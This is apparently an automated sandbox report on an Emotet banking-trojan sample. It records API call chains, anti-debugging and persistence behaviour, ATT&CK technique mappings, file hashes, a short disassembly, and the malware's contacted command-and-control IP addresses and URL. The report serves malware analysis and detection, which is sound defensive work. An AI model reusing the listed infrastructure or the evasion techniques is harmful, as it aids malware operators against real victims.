          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0042E202 lstrlenA,FindFirstFileA,FindClose,1_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00429112
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_0-42560
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_1-42504
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_1-44244
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe API call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00442426 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00442426
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00401AF0 mov eax, dword ptr fs:[00000030h]0_2_00401AF0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F0467 mov eax, dword ptr fs:[00000030h]0_2_022F0467
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F0C0C mov eax, dword ptr fs:[00000030h]0_2_022F0C0C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F1743 mov eax, dword ptr fs:[00000030h]0_2_022F1743
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023112CD mov eax, dword ptr fs:[00000030h]0_2_023112CD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_02311E04 mov eax, dword ptr fs:[00000030h]0_2_02311E04
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00401AF0 mov eax, dword ptr fs:[00000030h]1_2_00401AF0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F0467 mov eax, dword ptr fs:[00000030h]1_2_022F0467
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F0C0C mov eax, dword ptr fs:[00000030h]1_2_022F0C0C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F1743 mov eax, dword ptr fs:[00000030h]1_2_022F1743
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E12CD mov eax, dword ptr fs:[00000030h]1_2_023E12CD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1E04 mov eax, dword ptr fs:[00000030h]1_2_023E1E04
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E40467 mov eax, dword ptr fs:[00000030h]2_2_00E40467
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E40C0C mov eax, dword ptr fs:[00000030h]2_2_00E40C0C
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E41743 mov eax, dword ptr fs:[00000030h]2_2_00E41743
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E512CD mov eax, dword ptr fs:[00000030h]2_2_00E512CD
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E51E04 mov eax, dword ptr fs:[00000030h]2_2_00E51E04
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E40467 mov eax, dword ptr fs:[00000030h]3_2_00E40467
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E40C0C mov eax, dword ptr fs:[00000030h]3_2_00E40C0C
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E41743 mov eax, dword ptr fs:[00000030h]3_2_00E41743
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E712CD mov eax, dword ptr fs:[00000030h]3_2_00E712CD
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71E04 mov eax, dword ptr fs:[00000030h]3_2_00E71E04
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023114F2 GetProcessHeap,RtlAllocateHeap,0_2_023114F2
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004366C1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004366C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043B152 SetUnhandledExceptionFilter,0_2_0043B152
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043BF7D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BF7D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004366C1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004366C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043B152 SetUnhandledExceptionFilter,1_2_0043B152
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043BF7D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043BF7D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FD587 cpuid 0_2_022FD587
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_004420D1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0043C0B5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_004421F9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00442192
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00442235
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_004429C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_0044298D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00442B00
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00440CFD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_00415026
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_0044136B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_004415C3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_00441889
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,0_2_00443A6E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_00441CDC
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00441DF3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00441EFF
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_00441E8B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_004420D1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,1_2_0043C0B5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_004421F9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_00442192
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_00442235
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004429C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,1_2_0044298D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00442B00
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00440CFD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,1_2_00415026
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_0044136B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_004415C3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_00441889
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,1_2_00443A6E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_00441CDC
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_00441DF3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_00441EFF
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,1_2_00441E8B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043BA29 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0043BA29
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043EB76 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0043EB76
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004016F0 GetVersion,GetVersion,GetVersion,DragAcceptFiles,UpdateWindow,0_2_004016F0
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Emotet
          Source: Yara match, File source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts 1 | Native API 121 | Valid Accounts 1 | Valid Accounts 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 2 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
          Default Accounts | Command and Scripting Interpreter 2 | Windows Service 12 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | LSASS Memory | System Service Discovery 1 | Remote Desktop Protocol | Input Capture 2 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Service Execution 12 | Logon Script (Windows) | Windows Service 12 | Software Packing 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 1 | File Deletion 1 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 12 | LSA Secrets | Security Software Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 1 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          YF4dF4w2Cr.exe | 41% | Metadefender |
          YF4dF4w2Cr.exe | 86% | ReversingLabs | Win32.Trojan.Emotet
          YF4dF4w2Cr.exe | 100% | Avira | TR/AD.Emotet.ddim

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.YF4dF4w2Cr.exe.22f053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.YF4dF4w2Cr.exe.22f053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.0.fwdrrebrand.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ddim
          0.2.YF4dF4w2Cr.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137917
          0.0.YF4dF4w2Cr.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ddim
          3.2.fwdrrebrand.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137917
          2.2.fwdrrebrand.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137917
          2.2.fwdrrebrand.exe.e4053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.0.YF4dF4w2Cr.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ddim
          1.2.YF4dF4w2Cr.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137917
          3.2.fwdrrebrand.exe.e4053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.0.fwdrrebrand.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.ddim

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://201.196.15.79/pnp/splash/loadan/merge/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://201.196.15.79/pnp/splash/loadan/merge/ | fwdrrebrand.exe, 00000003.00000002.911061816.0000000000199000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

          Contacted IPs


          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          144.76.62.10 | unknown | Germany | 24940 | HETZNER-ASDE | false
          203.99.188.203 | unknown | Pakistan | 45595 | PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK | false
          201.196.15.79 | unknown | Costa Rica | 11830 | InstitutoCostarricensedeElectricidadyTelecomCR | false
          200.55.168.82 | unknown | Cuba | 27725 | EmpresadeTelecomunicacionesdeCubaSACU | false
          213.138.100.98 | unknown | United Kingdom | 35425 | BYTEMARK-ASGB | false
          190.117.206.153 | unknown | Peru | 12252 | AmericaMovilPeruSACPE | false
          203.99.187.137 | unknown | Pakistan | 45595 | PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK | false
          70.32.94.58 | unknown | United States | 398110 | GO-DADDY-COM-LLCUS | false

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:376398
          Start date:26.03.2021
          Start time:13:31:05
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:YF4dF4w2Cr (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:10
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal92.bank.troj.evad.winEXE@6/0@0/8
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 60.2% (good quality ratio 59%)
          • Quality average: 84.1%
          • Quality standard deviation: 23.5%
          HCA Information:
          • Successful, ratio: 72%
          • Number of executed functions: 174
          • Number of non-executed functions: 355
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/376398/sample/YF4dF4w2Cr.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs


                Domains

                No context

                ASN


                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.584976742352093
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:YF4dF4w2Cr.exe
                File size:502272
                MD5:f4d1470af3a7d82560b38558b132d468
                SHA1:0c45cf4e32116eae8d73b52c140f5d91a19ee8ea
                SHA256:6fa0dd6002d4b4e7ebabefc7f4f90f36fc53069e0cf4e845f683fb087d476e90
                SHA512:1f45093e1509d86ab03ee2c6f15a6dbc3ed4f41cac3c8faf5ae66445b787b58bf9e69d047d7ead3d1d22284d351fbb739a7a7eb73180f746f3d4f621859206c8
                SSDEEP:12288:x1n6BAlECcMIR4WlptZ2uOIR4bi6/Myw52BLhDG5Fq:x16SbcMMlpLLOS
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...V...V...V..s;...V..s-...V...W...V.......V.......V.....X.V.......V.......V.......V.Rich..V.........................PE..L..

                File Icon

                Icon Hash:64e4c4e4e4c4e4f0

                Static PE Info

                General

                Entrypoint:0x4316ec
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x5D99FBDA [Sun Oct 6 14:36:10 2019 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:0
                File Version Major:5
                File Version Minor:0
                Subsystem Version Major:5
                Subsystem Version Minor:0
                Import Hash:9f251661407b9fa6502b6b65d148504e

                Entrypoint Preview

                Instruction
                call 00007FBC6C9E301Dh
                jmp 00007FBC6C9D8B5Dh
                push 0000000Ch
                push 0045DF00h
                call 00007FBC6C9D8DFBh
                mov esi, dword ptr [ebp+08h]
                test esi, esi
                je 00007FBC6C9D8D57h
                cmp dword ptr [00468784h], 03h
                jne 00007FBC6C9D8D25h
                push 00000004h
                call 00007FBC6C9E168Bh
                pop ecx
                and dword ptr [ebp-04h], 00000000h
                push esi
                call 00007FBC6C9E16B3h
                pop ecx
                mov dword ptr [ebp-1Ch], eax
                test eax, eax
                je 00007FBC6C9D8CEBh
                push esi
                push eax
                call 00007FBC6C9E16D4h
                pop ecx
                pop ecx
                mov dword ptr [ebp-04h], FFFFFFFEh
                call 00007FBC6C9D8CF0h
                cmp dword ptr [ebp-1Ch], 00000000h
                jne 00007FBC6C9D8D19h
                push dword ptr [ebp+08h]
                jmp 00007FBC6C9D8CECh
                push 00000004h
                call 00007FBC6C9E1577h
                pop ecx
                ret
                push esi
                push 00000000h
                push dword ptr [00466EACh]
                call dword ptr [0044E22Ch]
                test eax, eax
                jne 00007FBC6C9D8CF8h
                call 00007FBC6C9D92B6h
                mov esi, eax
